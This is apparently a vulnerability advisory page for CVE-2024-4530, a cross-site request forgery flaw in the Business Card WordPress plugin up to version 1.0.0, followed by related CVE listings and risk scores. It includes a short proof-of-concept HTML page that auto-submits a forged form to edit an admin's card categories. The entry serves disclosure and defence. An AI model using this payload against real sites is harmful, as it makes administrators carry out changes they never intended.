Lucene search
Bob MatyasWPEX-ID:952F6B5C-7728-4C87-8826-6B493F51A979HistoryMay 06, 2024 - 12:00 a.m.
Business Card <= 1.0.0 - Category Edit via CSRF
2024-05-0600:00:00
Bob Matyas
22
category edit
csrf
exploit
vulnerability
fix
may 20 2024
Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions such as editing card categories via CSRF attacks
Make a logged in admin open an HTML document containing:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/wp-admin/admin.php?page=es-bcard-category" method="post">
<input type="hidden" name="edit_cat_2" value='CSRFxCSRFxCSRF'>
<input type="hidden" name="edit_category" value="2">
<input type="submit" value="Submit" />
</form>
</body>
```Related
wpvulndb
wpvulndb
Business Card <= 1.0.0 - Category Edit via CSRF
2024-05-06 00:00:00
cve
cve
CVE-2024-4530
2024-05-27 06:15:09
cvelist
cvelist
CVE-2024-4530 Business Card <= 1.0.0 - Category Edit via CSRF
2024-05-27 06:00:01
nvd
nvd
CVE-2024-4530
2024-05-27 06:15:09
vulnrichment
vulnrichment
CVE-2024-4530 Business Card <= 1.0.0 - Category Edit via CSRF
2024-05-27 06:00:01
wordfence
wordfence
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:952F6B5C-7728-4C87-8826-6B493F51A979